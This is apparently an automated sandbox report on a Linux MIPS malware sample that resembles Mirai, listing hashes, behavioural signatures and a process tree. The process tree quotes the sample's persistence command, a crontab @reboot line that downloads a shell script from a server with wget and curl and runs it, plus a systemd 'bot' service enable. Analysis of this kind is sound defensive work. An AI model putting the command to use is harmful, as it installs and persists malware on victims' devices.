Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20231215-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20231215-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    19/02/2024, 06:25

General

  • Target

    ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf

  • Size

    98KB

  • MD5

    e5409ee931e29ffc035bf8802a141084

  • SHA1

    ce5d9cbe2ce5c217d55472240afb05a21d6ea69e

  • SHA256

    ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731

  • SHA512

    6793c7247613d08903105dcb41e33e9785f0c78c186217383b87814d6465b94add98113442b4b56c8f0f00d10d514420b9f9a3e2424d7d2eb77a87f44bdc79f4

  • SSDEEP

    1536:nR8r9obMb1xSK0AqVNvBOUUiMx7CBSkHC3eANKlDZQYr8N4eAe7ZiA:nRG9obMb1xb0AqVi3eLDhje7V

Score
7/10

Malware Config

Signatures

  • Changes its process name 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies systemd 1 TTPs 1 IoCs

    Adds or modifies systemd service files, likely to achieve persistence.

  • Modifies Bash startup script 1 TTPs 1 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
    /tmp/ec8201f3323c5996a021e2abd0310dccd5ce90059cb6ee4c4af2b56bd326e731.elf
    1⤵
    • Changes its process name
    • Modifies Watchdog functionality
    • Reads runtime system information
    PID:697
  • /bin/sh
    sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
    1⤵
    PID:709
      • /usr/bin/crontab
        crontab -
        2⤵
        • Creates/modifies Cron job
        PID:712
      • /bin/sh
        sh bins.sh
        2⤵
        PID:711
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:713
  • /bin/chmod
    chmod +x bins.sh
    1⤵
    PID:717
  • /bin/sh
    sh bins.sh
    1⤵
    PID:718
  • /bin/curl
    /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
    1⤵
    PID:720
  • /bin/chmod
    chmod +x bins.sh
    1⤵
    PID:721
  • /bin/sh
    sh -c "/bin/systemctl enable bot"
    1⤵
    PID:722
      • /bin/systemctl
        /bin/systemctl enable bot
        2⤵
        • Enumerates kernel/hardware configuration
        • Reads runtime system information
        PID:723

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /lib/systemd/system/bot.service

    Filesize
    356B

    MD5
    f03c70cd4c61a1852f9e19b8fb0d639c

    SHA1
    a6c078ffffdf05c4c47b273b24e6b3ff4ef7e008

    SHA256
    ae50a3052a395987a2779deb9253d4aa8638f2f8b1cda7df9039388f21be7a90

    SHA512
    6277fbbffcdd72fc3712721525538ac07fc46d290ebb02be34cef52b3e62bfa8a66f4e834d364d220108c815192e391ad986f05662fcbfae674417507f4bcc20

  • /var/spool/cron/crontabs/tmp.6oSfa1

    Filesize
    235B

    MD5
    a2c0cc09cb164e5d3737cbb278f9de89

    SHA1
    6b603cb91d1504052b9fca0c4d35d4a7e454aef3

    SHA256
    89b7403cf88dce252c8c767c1738f14893c16aa1683665fb06c4cfcfbfbc0d6c

    SHA512
    d460e905a1a1fd2981ef17bae23af307cda3000d2e7507ec654c7960bb88d70b455f7c183bac7c38dfc6d7621a8f758041fd37b17b9ec028e7f6a5b0cd759644